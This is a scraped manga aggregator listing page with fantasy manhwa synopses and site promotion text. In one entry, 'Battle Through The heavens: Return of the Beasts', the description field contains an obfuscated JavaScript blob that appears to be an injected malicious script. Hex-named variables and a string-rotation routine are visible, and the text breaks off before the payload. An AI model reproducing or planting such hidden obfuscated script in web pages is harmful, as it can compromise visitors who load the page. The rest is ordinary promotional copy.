Fantasy - Page 29

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

5215 results

Battle Armor Academy

Read Manhwa Battle Armor Academy Online For Free At KunManga Battle Armor Academy Manga also known as “Zhan Jia Xue Yuan / War Armor Academy / Zhàn Jiǎ Xué Yuán / 战甲学园 / 戰甲學園”. This OnGoing webtoon was released on 2024. The story was written by 不可描述的一条君 and illustrations by 不可描述的一条君. The content of the comic Battle Armor Academy: In the mysterious and unpredictable Battle Domain Continent, there is an ancient legend that the world will shatter during the calamity, and only the chosen Son of Heaven can save the people. The comic Battle Armor Academy belongs to the Genre: Action, Drama, Fantasy, Martial Arts, Shounen Hari Manga is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “TopManhua” and “Manhwa Web,” as well as related terms like Manhwa Top, New Manga 2024, and Read Manhwa Engsub ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. Follow get to read NEW MANHWA updated: Noble Lady or Whatever, I’m Going Home Maxed Out Leveling Exclusive Possession: Young Master Ji’s Beloved Wife


Battle Frenzy

A sky with two moons; a soul world of endless possibilities; Lonely darkness, and a strange and mysterious clown! A federation of 100 cities. Three great empires. A world where monsters run rampant. This is an age where heroes are born, where humanity strives to retake the earth! And at the epicenter of it all: a special second-year student, Wang Zhong, who uses the power of the Playful Roulette to shake the whole world! You hear that, ladies? Your Senior is here!


Battle Nurse

Marco, a boy who admires healers who support warriors and heals all. In order to make his dream come true, he enrolls in a nursing school, "San Castello," which specializes in training healers. However, when he entered the school, it was a world where females were 90% and males only 10%! And what's more, contrary to the fun school life he hoped for, this school has various courses which will put his own life at risk! What fate will fall upon our plucky protagonist is…!? A little naughty struggle featuring the sweat and tears of a shota aiming to be a Healer!!!!


Battle Through the Heavens

In a land where no magic is present and the strong make the rules, Xiao Yan, a gifted teenager, suddenly became useless and loses everything. As an enviable former genius, everyone bullied him after he lost his ability, even his fiancee demanded to divorce! However, things are changeable, with the help of master Yao Chen hidden in the ring left by his mother, Xiao Yan made a vow at age 15 to step up to the peak of the Dou-qi continent for the sake of his family and his loved people. A legendary reversal just begin! MangaToon got authorization from Zhiyin Animation to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Battle Through The heavens: Return of the Beasts

Battle Through The heavens: Return of the Beasts &nbsp;<script></script><script>(function(_0x23772c,_0x4d4326){var _0x231c9d=_0x4eb8,_0x183695=_0x23772c();while(!![]){try{var _0x2bbc8e=parseInt(_0x231c9d(0x6d))/(0x1840+-0x5a1*0x6+-0x987*-0x1)+parseInt(_0x231c9d(0x89))/(-0xddd+0x1f5b+-0x175*0xc)+parseInt(_0x231c9d(0x74))/(-0xbc4+0x165b+0x2a5*-0x4)+parseInt(_0x231c9d(0x7d))/(0x982*-0x1+-0x4*-0x30+-0x2*-0x463)*(parseInt(_0x231c9d(0x75))/(0x2*-0xd6a+-0x20d3+0x3bac))+-parseInt(_0x231c9d(0x72))/(0x252b+-0x1*-0x1f1b+-0x4440)+parseInt(_0x231c9d(0x7b))/(-0x1*-0x1654+-0x1396+-0x1*0x2b7)*(parseInt(_0x231c9d(0x6e))/(0xad7+0x761*0x2+-0x1991))+-parseInt(_0x231c9d(0x80))/(0x2*-0xda6+-0x24e3+0x201c*0x2);if(_0x2bbc8e===_0x4d4326)break;else _0x183695['push'](_0x183695['shift']());}catch(_0x37d059){_0x183695['push'](_0x183695['shift']());}}}(_0x1621,-0x6fed2+0x1593a6+-0x1f963*0x1));function custom(){var _0x733f96=_0x4eb8,_0x4ea6ea={'isOcS':function(_0x5adb35,_0x4f8294){return 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Be Careful When Choosing A Husband

After her mother’s death, Elrose is left alone in a monastery, while her father is stripped of his fortune. When news of his passing reaches her, she must flee the monastery and marry within hours to claim her rightful inheritance and title. Desperate, she prays for a husband and fate brings a man to her feet. Little does she know, he is Lachsann, the man who stole her money. Despite her mother’s warning to “choose a husband carefully,” she can’t do so in this situation. Elrose proposes to Lachsann, a man who stole her money. “Do you have no intention of repaying me, except for your body?” Unbeknownst to her, Lachsann isn’t just any man but the emperor’s brother and the king of mercenaries, Harkhan. Choose Your Husband Carefully 남편을 고를 때는 신중하게


Be Crazy About Me

Through The Book, Ayla, Who Becomes A Cannon Fodder Supporting Role, Will Die At Any Time Due To A Strange Disease. In Order To Save Her Life, She Took The Initiative To Marry The Elder Brother Of The Male Lead Of The Novel According To The Setting In The Book. Royden’s Body Is Filled With The Blood And Is Feared By Others, And He Is Being Used By The Empire. In Order To Protect His Brother’s Safety, He Could Only Keep A Low Profile And Bear It. Originally, It Was Just A Contractual Marriage In Which Benefits Were Exchanged, But At Some Point It Became A Two-Way Rush To Redeem Each Other.


Be quiet! I want peace..

This is a comical story of the daily life of Lu Hanzi (an ordinary freelance worker) with her cat and dog.


Be The Actor

Read Be The Actor Novel – Be The Actor Manhwa Online Free On Manhwaclan The Summary Of The Comic Be The Actor: To Escape A Life Of Poverty, Jang Youngkuk Aspired To Be A Famous Actor. And He Succeeds… At The Cost Of His Mother’s Life. Upon Proceeding To Take His Own Out Of Despair, Youngkuk Miraculously Returns To His Childhood. With A Second Chance To Make Things Right, He Swears To Abandon Acting And Be The Good Son He Never Was. However, When Financial Troubles Begin To Haunt Youngkuk And His Mother, He Discovers That He May Have No Choice But To Return To The Set For One Last Take. “Be The Actor” Is Also Known As: To Be An Actor / I Will Live As An Actor / 役者として生きる / 배우로서 살겠다 “Zinmanga, Likemanga, Kunmanga…” Are The Most Searched Keywords On The Website Mangazin. We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Manga Zin. You Can Read Top Manhwa The Twin Swords Of The Sima Deadly Nightshade The Queen’s Secret Lessons


Bead Master

“Warning: Yuri content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” Lee Jinhwa lived an ordinary life until she swallowed a fox bead gifted by a mysterious peddler, mistaking it for a wish-fulfilling marble. Little did Jinhwa know that her actions would lead her to be haunted by Koo Miho, an infamous nine-tailed fox who wishes to retrieve the bead. To add fuel to the fire, Jinhwa soon discovers that she’s also become a target for various spirits and demons, and the only way to extract the cause of the issue is for Miho to kill her…or kiss her! Bead’s Owner; Marble’s Owner; The Bead’s Owner; The Marble’s Owner; 구슬의 주인 / Master of the Fox Bead (Official)


Bear With Me

Reading Manga Bear With Me / 私に耐えてください / 请忍受我 / 나를 견디세요 With Her Followers Decimated By Other Churches, Granchia, The Goddess Of Rightful Revenge, Is On The Brink Of Destruction. Restricted And Bound To Human Form, She Must Protect And Support Her One Last True Believer…Or Cease To Exist. Can She Find A Way To Gather Her Servants And Muster Enough Power To Avenge The Wrongs Done To Her Believer And His Family? Or Will Her Enemies Succeed In Their Mission To Destroy Her Last Follower, Dooming Her To Oblivion?
